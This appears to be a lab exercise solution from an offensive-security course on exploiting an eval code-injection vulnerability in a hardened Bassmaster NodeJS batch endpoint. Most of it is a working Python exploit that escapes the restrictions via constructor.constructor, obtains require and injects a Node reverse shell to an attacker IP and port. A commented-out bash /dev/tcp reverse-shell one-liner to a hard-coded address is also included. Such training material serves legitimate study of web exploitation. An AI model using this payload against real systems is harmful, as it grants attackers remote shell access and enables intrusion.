7.5
The student user home directory contains a sub-directory named bassmaster_extramile. In this directory we slightly modified the Bassmaster original code to harden the exploitation of the vulnerability covered in this module.
Launch the NodeJS batch.js example server from the extra mile directory and exploit the eval code injection vulnerability overcoming the new restrictions in place.
Solution
- Use x.constructor.constructor() to define the
processmodule. - Use
processto definerequire. - Construct the reverse shell payload as required.
import requests,sys
if len(sys.argv) != 4:
print "(+) usage: %s <target> <attacking ip address> <attacking port>" % sys.argv[0]
sys.exit(-1)
target = "http://%s:8080/batch" % sys.argv[1]
cmd = "\\\\x2fbin\\\\x2fbash"
attackerip = sys.argv[2]
attackerport = sys.argv[3]
request_1 = '{"method":"get","path":"/profile"}'
request_2 = '{"method":"get","path":"/item"}'
shell = 'process = parts.constructor.constructor(\'return (function(){return process})()\')(); var require = process.mainModule.require;'
shell += 'var net = require(\'net\'),sh = require(\'child_process\').exec(\'%s\'); ' % cmd
shell += 'var client = new net.Socket(); '
shell += 'client.connect(%s, \'%s\', function() {client.pipe(sh.stdin);sh.stdout.pipe(client);' % (attackerport, attackerip)
shell += 'sh.stderr.pipe(client);});'
#shell = "parts.constructor.constructor('return child_process')().exec('bash -i >& /dev/tcp/192.168.119.173/4444 0>&1')"
request_3 = '{"method":"get","path":"/item/$1.id;%s"}' % shell
json = '{"requests":[%s,%s,%s]}' % (request_1, request_2, request_3)
r = requests.post(target, json)
print r.content